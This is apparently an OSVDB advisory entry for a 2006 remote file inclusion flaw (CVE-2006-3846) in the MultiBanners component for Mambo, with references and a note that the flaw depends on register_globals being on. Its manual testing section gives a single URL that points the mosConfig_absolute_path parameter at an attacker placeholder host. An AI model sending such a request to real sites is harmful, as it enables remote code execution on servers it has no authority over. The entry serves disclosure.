MultiBanners for Mambo extadminmenus.class.php mosConfig_absolute_path Variable Remote File Inclusion

2006-07-20T07:34:02
ID OSVDB:27441
Type osvdb
Reporter OSVDB
Modified 2006-07-20T07:34:02

Description

Technical Description

This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).

Manual Testing Notes

http://[target]/[path]//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=[attacker]

References:

Vendor URL: http://mamboxchange.com/projects/multibanners/ Vendor Specific News/Changelog Entry: http://forum.joomla.org/index.php/topic,77977.0.html Vendor Specific News/Changelog Entry: http://forum.joomla.org/index.php/topic,79477.0.html Secunia Advisory ID:21168 Other Advisory URL: http://solpotcrew.org/adv/BlueSpy-adv-multibanners.txt Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-07/0402.html CVE-2006-3846